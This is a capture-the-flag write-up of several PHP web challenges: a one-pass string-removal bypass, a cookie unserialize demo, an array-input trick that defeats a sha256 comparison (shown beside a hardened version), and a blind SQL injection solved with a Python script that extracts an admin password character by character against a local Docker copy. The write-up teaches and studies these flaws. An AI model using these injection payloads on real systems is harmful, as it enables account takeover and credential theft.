Description: A JOURNEY TO GAIN KNOWLEDGE
Web Challenge
```php
<?php
if (isset($_GET['bingus'])) {
    $input = $_GET['bingus'];
    $to_replace = 'bingus';
    // One pass of removal: every match of "bingus" is deleted, but the
    // result is never re-checked
    $clean_string = preg_replace("/$to_replace/", '', $input);
    echo "<p>Your string is: $clean_string</p>";
    if ($clean_string == $to_replace) {
        echo "<h2 class=\"answer\">Bingus <span style=\"color: green;\">IS</span> your beloved</h2>";
        output_flag();
    } else {
        echo "<h2 class=\"answer\">Bingus <span style=\"color: red;\">IS NOT</span> your beloved</h2>";
    }
}
?>
```
- Notice that `$clean_string` is generated by removing every occurrence of `bingus` from the input in a single pass.
- So we just input something that, after that replacement, is equal to `bingus`.
demo:
```php
<?php
class User
{
    public $role = 'Admin';
}

$default_user = new User;

// Simulate the cookie the client would send back on its next request;
// setcookie() alone only emits a response header and does not fill $_COOKIE
$_COOKIE['user'] = serialize($default_user);
setcookie(
    'user',
    serialize($default_user)
);

// The server trusts the cookie and rebuilds the object from it
$a = unserialize($_COOKIE['user']);
echo $_COOKIE['user'];   // O:4:"User":1:{s:4:"role";s:5:"Admin";}
```
```php
<?php
if (isset($_GET['input1']) and isset($_GET['input2'])) {
    if ($_GET['input1'] == $_GET['input2']) {
        print '<h3 class="error">Nice try, but it won\'t be that easy ;)</h3>';
    } else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) {
        output_flag();
    } else {
        print '<h3 class="error">Your inputs don\'t match</h3>';
    }
}
?>
<p>See if you can make the sha256 hashes match</p>
<br />
<a href="/php3/index.php?source=true">Source Code</a>
<form method="get">
    <input type="text" required name="input1" placeholder="Input 1" />
    <p>Hash: <?php if (isset($_GET['input1'])) print hash("sha256", $_GET['input1']) ?></p>
    <input type="text" required name="input2" placeholder="Input 2" />
    <p>Hash: <?php if (isset($_GET['input2'])) print hash("sha256", $_GET['input2']) ?></p>
    <input type="submit" />
</form>
</body>
</html>
```
Workflow:
- At first, I just searched around the keyword "SHA256 collision", but I got this one: it takes about 3.6×10^13 years to find, so it's not a practical option.
- After that I focused on `==` in PHP. Searching around, I found this and this.
- Now you just put `[]` in the input names (so PHP receives arrays instead of strings) and get the flag.
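Why the `[]` trick works, seen from the defender's side: the following PHP is an added example and not the challenge's own code. It reduces the check to a function, runs it on plain strings and on array inputs, and puts a hardened version beside it. The function names, the constructed inputs, and the string returned in place of `output_flag()` are assumptions of this example.

```php
<?php
// Added illustration, not the challenge's code: the php3 check reduced to a
// function, plus a hardened version. output_flag() is replaced by a string.

// The check as the challenge writes it
function vulnerable_check(array $get): string
{
    if ($get['input1'] == $get['input2']) {            // loose comparison
        return "Nice try";
    }
    // hash() receives whatever arrived: a string, or an array when the client
    // sent input1[]=a. PHP 7 returns NULL (plus a warning) for a non-string,
    // so NULL === NULL passes; PHP 8 throws a TypeError here instead.
    if (hash("sha256", $get['input1']) === hash("sha256", $get['input2'])) {
        return "FLAG";
    }
    return "Your inputs don't match";
}

// Hardened: reject anything that is not a string before it reaches hash(),
// compare the raw inputs strictly, and compare digests with hash_equals().
function hardened_check(array $get): string
{
    if (!is_string($get['input1']) || !is_string($get['input2'])) {
        return "Invalid input";
    }
    if ($get['input1'] === $get['input2']) {
        return "Nice try";
    }
    $h1 = hash("sha256", $get['input1']);
    $h2 = hash("sha256", $get['input2']);
    return hash_equals($h1, $h2) ? "FLAG" : "Your inputs don't match";
}

// Constructed requests: two plain strings, and the ?input1[]=a&input2[]=b form
$cases = [
    'strings' => ['input1' => 'a', 'input2' => 'b'],
    'arrays'  => ['input1' => ['a'], 'input2' => ['b']],
];
foreach ($cases as $name => $get) {
    try {
        printf("%-8s vulnerable: %s\n", $name, @vulnerable_check($get));
    } catch (TypeError $e) {
        printf("%-8s vulnerable: TypeError (PHP 8)\n", $name);
    }
    printf("%-8s hardened:   %s\n", $name, hardened_check($get));
}
```

On PHP 7 the `arrays` case reaches `FLAG` through the vulnerable check and `Invalid input` through the hardened one; on PHP 8 the vulnerable check dies with a TypeError, which is why the fix should be an explicit type check rather than a reliance on the runtime version.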
This challenge has ended and the website was turned off, so I built it in Docker from here.
- When you connect, look through the history in Burp Suite; you can find the link that redirects to the login page.
- Now read the hint: with 'admin' as the user, and the password field having no filter, that means it may be SQLi. Exactly, it's blind SQLi.
- I solved this challenge with Burp Suite, the same way as this lab.
Another way is to brute-force it with Python requests:
```python
import requests, string

url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login"
s = requests.session()
passwordRetrieve = ""

# Length probe used first to size the loop:
# ' or (select 'a' from users where username='admin' and length(Password)>36)='a
#
# The backslash sent as the username escapes the closing quote, so the query
# becomes
#   SELECT * from users WHERE username='admin\' AND Password = ''or 'True'
# and the password field controls the rest of the WHERE clause.
def solve():
    global passwordRetrieve
    index = 1  # SQL substr() positions are 1-based
    while True:
        for char in string.printable:
            usernamefield = "\\"
            passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a"
            postParam = {'user': usernamefield, 'pass': passwordfield}
            response = s.post(url, data=postParam).text
            # A response without the "Invalid" error means the guess was right
            if "Invalid" not in response:
                passwordRetrieve += char
                index += 1
                print(passwordRetrieve)
                break
        else:
            # No printable character matched at this position: stop instead
            # of looping forever
            break
        if index == 37:
            break

solve()
```
Thanks for reading. Have a good day ❤️ !